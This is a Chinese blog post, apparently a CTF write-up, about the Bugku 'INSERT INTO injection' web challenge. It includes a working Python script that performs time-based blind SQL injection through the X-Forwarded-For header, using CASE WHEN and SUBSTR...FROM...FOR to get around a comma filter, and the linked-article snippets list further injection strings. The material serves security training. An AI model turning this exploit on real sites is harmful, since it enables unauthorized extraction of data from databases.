bugku web——INSERT INTO注入

最新推荐文章于 2024-12-15 21:03:30 发布
最新推荐文章于 2024-12-15 21:03:30 发布
阅读量267 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: ctf-writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiaoduanDDG/article/details/107991431
本文探讨了在Bugku Web平台中遇到的INSERT INTO SQL注入问题,由于请求头可能存在SQL注入,并且系统过滤了逗号,作者通过使用CASE WHEN...THEN SLEEP(1) ELSE END语句绕过了逗号过滤,实现了基于时间的盲注。文中还提到了字段和表名均为'flag'的特殊情况,并分享了学习到的remote_addr、x_forwarded_for以及explode()函数的相关知识。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

bugku web——INSERT INTO注入

最爱的代码审计来
初步判断存在sql注入(请求头)
并且过滤了逗号
在这里插入图片描述

抓包试了一下,网页上没有回显点,所以是基于时间的盲注()

正常时间盲注用这种格式来完成 if(exp1,exp2,exp3)
但是代码中explode()函数已经将逗号过滤掉了
所以采用这种格式:case when exp1 then sleep(1) else end 来绕过逗号的过滤
exp1中字符串截取subtr1(str,1,1)又存在逗号,于是这里用substr (str) from 1 for 1

字段是flag,表名也是flag,至于为什么,网上大佬说是出题人和做题人的默契
写一个脚本:

import requests
url="http://123.206.87.240:8002/web15/"
flag=""
for i in range(1,33):
    for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*.":
        data="11' and (case when (substr((select group_concat(flag) from flag) from " + str(i) + " for 1 )='" + str1 + "') then sleep(4) else 1 end )) #"
        # print data
        headers = {"x-forwarded-for":data}
        try:
            result = requests.get(url,headers=headers,timeout=3)
        except requests.exceptions.ReadTimeout as e:
            flag += str1
            print (flag)
            break
print( 'flag:' + flag)

知识点补充:

remote_addr和x_forwarded_for
原文链接:https://www.cnblogs.com/kuracola/p/7482939.html
在这里插入图片描述

explode()函数
原文链接:https://www.w3school.com.cn/php/func_string_explode.asp
把字符串打散为数组

bugku INSERT INTO注入(基于时间的盲注,详细教程)
wssmiss的博客
07-22 1537
题目 链接地址:http://123.206.87.240:8002/web15/ 分析 打开页面后: 分析页面的php代码 通过源码分析,注入点在x-forwarded-for:client,proxy1,proxy2的clienr处。获取用户ip,并把ip插入到client_ip表中的ip列中 因为源码第一行,关闭了错误报告,所以没有回显。在此采取基于时间的盲注 ...
bugkuINSERT INTO注入解答
Just for funnnnnnnnnnnn
01-10 2266
本来不打算单独的ctf题目成文,但是这个题写payload快看花我的眼睛了,不写一篇记录一下代码对不住我的眼睛。 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $i...
bugku------INSERT INTO 注入
bylfsj的博客
09-30 519
原创 bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本) ...
CTF之Bugku insert into注入
weixin_41607190的博客
01-07 408
原理:x-forwared-for注入,时间盲注,insert注入 点开网址就是这么一句话,源码也给出 function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; #从x-forwared-for获取ip }else{ $ip =...
Bugkuweb INSERT INTO注入
qq_26961571的博客
09-09 246
打开之后, ​ 发现了一串代码,而这串代码就是php。一看这么多,我其实还是很有畏难情绪的,感觉脑壳都大了。但是怎么办,还是得硬上啊!!都已经啃到这里了,现在放弃也太可惜了吧其实最近思虑很多,感觉没有未来。每次都说那能怎么办呢??是啊,能怎么办呢?只能尽全力去想去做,但是真的好累。我又是缺乏安全感的人,要通过自己的努力调节情绪,已经不止一次想过要放弃了,放弃是多么简单的事情,比鼓起勇气的死亡还要简单的多。 回到正题,仔细分析一下代码。 error_reporting(0);​funct..
ctf web入门21
最新发布
03-17
cursor.executemany("INSERT INTO users VALUES (?, ?, ?)", [(None,"admin","password"),(None,"testuser", "securepass")]) conn.commit() query = f"SELECT * FROM users WHERE username='{username}' AND ...
SQL注入 (中级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 6万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQL的insert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
insert注入笔记
收集盒 Book box
07-06 809
Author:昆仑男银群里有人在问insert型的怎么注射,insert类型的我还没碰到过呢,就去看了看,做了一下笔记备忘。http://www.kunlun.com/nanyin.aspx?ProID=49579′ 加一个点,报错是insert类型的语句,百
bugku-web-insert into 注入
realstarstarli的博客
08-09 272
insert into 注入 题目分析 题目地址http://123.206.87.240:8002/web15/ 首先题目中已经给出了php源码,先分析一下。我在原来的代码上做了一些修改,便于调试操作。 <?php //隐藏报错信息 error_reporting(0); // 函数功能获取用户的ip地址 function getIp() { // PHP使用$_SERVER['HTTP_X_FORWARDED_FOR']获取IP //
bugku学习之37.insert into注入
s11show_163的博客
03-04 686
考察: xff头注入 insert into 注入格式是1'+(注入语句)# 延时注入 逗号屏蔽$ip_arr = explode(',', $ip);下无法使用if注入以及对substr函数修改引出的启发 给出了源码提示: <?php error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_...
insert注入
weixin_46784800的博客
11-10 2142
insert注入 insert用法 insert在数据库中可以直接插入数据,同时,insert还可以在数据库查询语句中用作字符串替换,例如: select insert("admin", 1, 1, ""); 上述语句查询结果为: 可以看见,insert语句可以将字符串指定位置的指定长度替换为指定字符串,该功能的insert语法为: INSERT(s1,x,len,s2) 其中的s1为目标字符串,x为替换的起始位置,len为替换的长度,s2为替换的字符串。通过改变len的值,可以获取到不同长度的字符串:
实验吧——who are you?(insert into注入 二分法 时间盲注)
weixin_30947043的博客
10-13 176
题目地址:http://ctf5.shiyanbar.com/web/wonderkun/index.php 根据提示 “我要把攻击我的人都记录db中去!” 猜测这是insert into注入,会向数据库储存ip地址,所以注入点便是我们的ip,而ip可以用X-Forwarded-For伪造 由于注入点的特殊,这里注入是不能用逗号的,因为服务器在从X-Forwarded-Fo...
php+insert+into+注入,PHP注入总结(写给自己)
weixin_36087083的博客
03-10 1772
' or 1=1' or '1=1'/*'%23' and password='mypassid=-1 union select 1,1,1id=-1 union select char(97),char(97),char(97)id=1 union select 1,1,1 from membersid=1 union select 1,1,1 from adminid=1 union sele...
【Oracle11g SQL详解】INSERT INTO 的用法及插入数据注意事项
weixin_39372311的博客
11-30 2943
是向表插入数据的核心 SQL 语句,适用于单行插入、批量插入以及基于查询的插入。语句用于向表中插入数据,是数据写入操作中最常用的 SQL 语句之一。块或外部数据工具(如 SQL*Loader)实现批量插入。列的顺序必须与提供的值一一对应,否则可能出现错误。的基本语法、常见场景、注意事项及常见错误处理。实现批量插入,但不支持单条语句直接插入多行。当需要插入某些列的默认值时,可以使用子查询。插入的值类型与列定义类型不匹配。的方式将查询结果插入目标表。检查并转换插入数据的类型。插入了重复的主键值。
SQL注入_insert&delete&update&selete
weixin_48131633的博客
10-26 5535
SQL注入_insert&delete&update&selete
【SQL注入】UPDATE、insert、delete注入
07-08 3845
【SQL注入
WEB安全基础 - - -SQL注入
weixin_67503304的博客
07-06 1407
依据web安全分析sql注入的基本知识点,方便以后sql注入的利用。
初步了解——SQL注入之增删改注入
2401_89233381的博客
12-15 1741
增删改注入主要是insert(增)注入,delete(删)注入,update(改)注入
针对INSERT语句的SQL注入
qq_69100706的博客
07-30 968
在CTF(Capture The Flag)竞赛中,针对INSERT语句的SQL注入是一种利用Web应用程序逻辑漏洞的技术,主要发生在应用程序接收用户输入并将其插入到数据库中时。如果应用程序没有正确地清理或参数化这些输入,攻击者可以注入恶意SQL代码,从而操纵数据库插入操作,甚至执行其他SQL命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值